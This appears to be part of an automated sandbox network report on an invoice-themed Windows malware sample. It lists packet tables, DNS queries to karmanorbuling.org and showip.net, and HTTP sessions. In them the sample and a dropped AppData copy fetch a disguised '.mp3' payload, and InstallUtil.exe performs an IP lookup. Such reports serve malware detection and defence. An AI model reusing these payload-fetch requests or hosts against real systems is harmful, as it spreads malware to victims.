                                                                                        Nov 18, 2024 08:30:51.303129911 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.303141117 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.303165913 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.303177118 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.443213940 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.443245888 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.443383932 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.443401098 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.443418026 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.443454981 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.443469048 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.443479061 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.443500042 CET44349808218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:51.443547010 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:51.446307898 CET49808443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:57.175810099 CET4980080192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:31:32.364726067 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:32.369764090 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:32.369828939 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:32.370306969 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:32.375119925 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208372116 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208401918 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208414078 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208463907 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.208501101 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.208543062 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208555937 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208568096 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208610058 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.208815098 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.208830118 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.209018946 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.209032059 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.209074974 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.213367939 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.213444948 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.213465929 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.213483095 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.213490963 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.213797092 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.335709095 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.335753918 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.335767984 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.335793018 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.335833073 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.335953951 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.335966110 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.335997105 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.336018085 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.336102009 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.336148977 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.336218119 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.336231947 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.336277008 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.336405039 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.336607933 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.336642981 CET8049974162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:31:33.336720943 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:31:33.336776018 CET4997480192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:32:13.603427887 CET4974280192.168.2.7162.55.60.2
                                                                                        Nov 18, 2024 08:32:13.611444950 CET8049742162.55.60.2192.168.2.7
                                                                                        Nov 18, 2024 08:32:13.611514091 CET4974280192.168.2.7162.55.60.2

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 18, 2024 08:30:10.590508938 CET6051653192.168.2.71.1.1.1
                                                                                        Nov 18, 2024 08:30:10.970217943 CET53605161.1.1.1192.168.2.7
                                                                                        Nov 18, 2024 08:30:23.628340960 CET5818653192.168.2.71.1.1.1
                                                                                        Nov 18, 2024 08:30:23.651071072 CET53581861.1.1.1192.168.2.7

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 18, 2024 08:30:10.590508938 CET192.168.2.71.1.1.10x74b3Standard query (0)karmanorbuling.orgA (IP address)IN (0x0001)false
                                                                                        Nov 18, 2024 08:30:23.628340960 CET192.168.2.71.1.1.10xd4a9Standard query (0)showip.netA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 18, 2024 08:30:10.970217943 CET1.1.1.1192.168.2.70x74b3No error (0)karmanorbuling.org218.208.91.137A (IP address)IN (0x0001)false
                                                                                        Nov 18, 2024 08:30:23.651071072 CET1.1.1.1192.168.2.70xd4a9No error (0)showip.net162.55.60.2A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • karmanorbuling.org
                                                                                        • showip.net

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749699218.208.91.137807780C:\Users\user\Desktop\Factura modificada____678979879.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 18, 2024 08:30:11.168972015 CET83OUTGET /Ggclxuylpwh.mp3 HTTP/1.1
                                                                                        Host: karmanorbuling.org
                                                                                        Connection: Keep-Alive
                                                                                        Nov 18, 2024 08:30:12.327896118 CET953INHTTP/1.1 301 Moved Permanently
                                                                                        Connection: Keep-Alive
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        content-length: 707
                                                                                        date: Mon, 18 Nov 2024 07:30:09 GMT
                                                                                        server: LiteSpeed
                                                                                        location: https://karmanorbuling.org/Ggclxuylpwh.mp3
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749742162.55.60.2808072C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 18, 2024 08:30:23.681763887 CET58OUTGET / HTTP/1.1
                                                                                        User-Agent: Project1
                                                                                        Host: showip.net
                                                                                        Nov 18, 2024 08:30:24.505554914 CET1236INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Headers: *
                                                                                        Access-Control-Allow-Methods: *
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Date: Mon, 18 Nov 2024 07:30:24 GMT
                                                                                        Server: Caddy
                                                                                        Transfer-Encoding: chunked
                                                                                        Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                                                        Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                                                        Nov 18, 2024 08:30:24.505573988 CET212INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                                                        Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.p
                                                                                        Nov 18, 2024 08:30:24.505600929 CET1236INData Raw: 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66
                                                                                        Data Ascii: rototype)return a;a[b]=c.value;return a}; function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(
                                                                                        Nov 18, 2024 08:30:24.505618095 CET1236INData Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 20 20 20 20 20 20 76 61 72 20 6e 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                        Data Ascii: rguments.length;c++)b[c-a]=arguments[c];return b} var na="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(
                                                                                        Nov 18, 2024 08:30:24.505635023 CET176INData Raw: 79 6d 62 6f 6c 28 29 3a 76 6f 69 64 20 30 2c 47 3d 46 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 46 5d 7c 3d 62 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 6f 69 64 20 30 21 3d 3d 61 2e 67 3f 61 2e 67 7c 3d 62 3a 4f 62 6a 65 63 74
                                                                                        Data Ascii: ymbol():void 0,G=F?function(a,b){a[F]|=b}:function(a,b){void 0!==a.g?a.g|=b:Object.defineProperties(a,{g:{value:b,configurable:!0,writable:!0,enumerable:!1}})};function va(a){v
                                                                                        Nov 18, 2024 08:30:24.505650997 CET1236INData Raw: 61 72 20 62 3d 48 28 61 29 3b 31 21 3d 3d 28 62 26 31 29 26 26 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 28 61 29 26 26 28 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c
                                                                                        Data Ascii: ar b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b|1))} var H=F?function(a){return a[F]|0}:function(a){return a.g|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a
                                                                                        Nov 18, 2024 08:30:24.505667925 CET212INData Raw: 65 3d 61 2e 6c 65 6e 67 74 68 2c 66 3d 64 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 61 5b 66 5d 3b 6e 75 6c 6c 21 3d 67 26 26 67 21 3d 3d 63 26 26 28 63 5b 66 2d 62 5d 3d 67 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d
                                                                                        Data Ascii: e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Arr
                                                                                        Nov 18, 2024 08:30:24.505681992 CET1236INData Raw: 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 74 61 26 26 6e 75 6c 6c 21 3d 61 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 69 66 28 75 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 30 2c 64 3d 61 2e 6c
                                                                                        Data Ascii: ay.isArray(a)&&ta&&null!=a&&a instanceof Uint8Array){if(ua){for(var b="",c=0,d=a.length-10240;c<d;)b+=String.fromCharCode.apply(null,a.subarray(c,c+=10240));b+=String.fromCharCode.apply(null,c?a.subarray(c):a);a=btoa(b)}else{void 0===b&&(b=0);
                                                                                        Nov 18, 2024 08:30:24.505697966 CET1236INData Raw: 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 68 29 26 26 28 67 5b 68 5d 3d 44 61 28 61 5b 68 5d 2c 62 2c 63 2c 64 2c 65 2c 66 29 29 3b 61 3d 67 7d 65 6c 73 65 20 61 3d 62 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 61 7d 7d 0a 20 20 20
                                                                                        Data Ascii: sOwnProperty.call(a,h)&&(g[h]=Da(a[h],b,c,d,e,f));a=g}else a=b(a,d);return a}} function Ea(a,b,c,d,e,f){var g=d||c?H(a):0;d=d?!!(g&32):void 0;a=Array.prototype.slice.call(a);for(var h=0;h<a.length;h++)a[h]=Da(a[h],b,c,d,e,f);c&&c(g,a);re
                                                                                        Nov 18, 2024 08:30:24.505716085 CET1236INData Raw: 29 7d 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 4c 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 4d 61 3b 76 61 72 20 64 3d 76 6f 69 64 20 30 3d 3d 3d 64 3f 21 31 3a 64 3b 76 61 72 20 65 3d 61 2e 68 3b 76 61 72 20 66 3d 4a 28 65 29 2c 67 3d 4a 61
                                                                                        Data Ascii: )} function La(a,b){var c=Ma;var d=void 0===d?!1:d;var e=a.h;var f=J(e),g=Ja(e,f,b,d);var h=!1;if(null==g||"object"!==typeof g||(h=Array.isArray(g))||g.s!==M)if(h){var k=h=H(g);0===k&&(k|=f&32);k|=f&2;k!==h&&I(g,k);c=new c(g)}else c=void
                                                                                        Nov 18, 2024 08:30:24.510617018 CET1236INData Raw: 2c 72 3d 68 5b 6b 5d 2c 6e 75 6c 6c 3d 3d 68 5b 6b 5d 3f 68 5b 6b 5d 3d 63 3f 4f 3a 77 61 28 29 3a 63 26 26 72 21 3d 3d 4f 26 26 76 61 28 72 29 7d 64 3d 62 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 62 3b 0a 20 20 20 20 20 20
                                                                                        Data Ascii: ,r=h[k],null==h[k]?h[k]=c?O:wa():c&&r!==O&&va(r)}d=b.length;if(!d)return b; var Ca;if(N(h=b[d-1])){a:{var y=h;e={};c=!1;for(var ca in y)Object.prototype.hasOwnProperty.call(y,ca)&&(a=y[ca],Array.isArray(a)&&a!=a&&(c=!0),null!=a?e[ca]=a:c


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.749800218.208.91.137805784C:\Users\user\AppData\Roaming\WrappedObject.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 18, 2024 08:30:33.504511118 CET83OUTGET /Ggclxuylpwh.mp3 HTTP/1.1
                                                                                        Host: karmanorbuling.org
                                                                                        Connection: Keep-Alive
                                                                                        Nov 18, 2024 08:30:34.648133039 CET953INHTTP/1.1 301 Moved Permanently
                                                                                        Connection: Keep-Alive
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        content-length: 707
                                                                                        date: Mon, 18 Nov 2024 07:30:32 GMT
                                                                                        server: LiteSpeed
                                                                                        location: https://karmanorbuling.org/Ggclxuylpwh.mp3
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.749974162.55.60.2802980C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 18, 2024 08:31:32.370306969 CET58OUTGET / HTTP/1.1
                                                                                        User-Agent: Project1
                                                                                        Host: showip.net
                                                                                        Nov 18, 2024 08:31:33.208372116 CET1236INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Headers: *
                                                                                        Access-Control-Allow-Methods: *
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Date: Mon, 18 Nov 2024 07:31:33 GMT
                                                                                        Server: Caddy
                                                                                        Transfer-Encoding: chunked
                                                                                        Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                                                        Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                                                        Nov 18, 2024 08:31:33.208401918 CET212INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                                                        Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.p
                                                                                        Nov 18, 2024 08:31:33.208414078 CET1236INData Raw: 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66
                                                                                        Data Ascii: rototype)return a;a[b]=c.value;return a}; function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(
                                                                                        Nov 18, 2024 08:31:33.208543062 CET1236INData Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 20 20 20 20 20 20 76 61 72 20 6e 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                        Data Ascii: rguments.length;c++)b[c-a]=arguments[c];return b} var na="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(
                                                                                        Nov 18, 2024 08:31:33.208555937 CET1236INData Raw: 79 6d 62 6f 6c 28 29 3a 76 6f 69 64 20 30 2c 47 3d 46 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 46 5d 7c 3d 62 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 6f 69 64 20 30 21 3d 3d 61 2e 67 3f 61 2e 67 7c 3d 62 3a 4f 62 6a 65 63 74
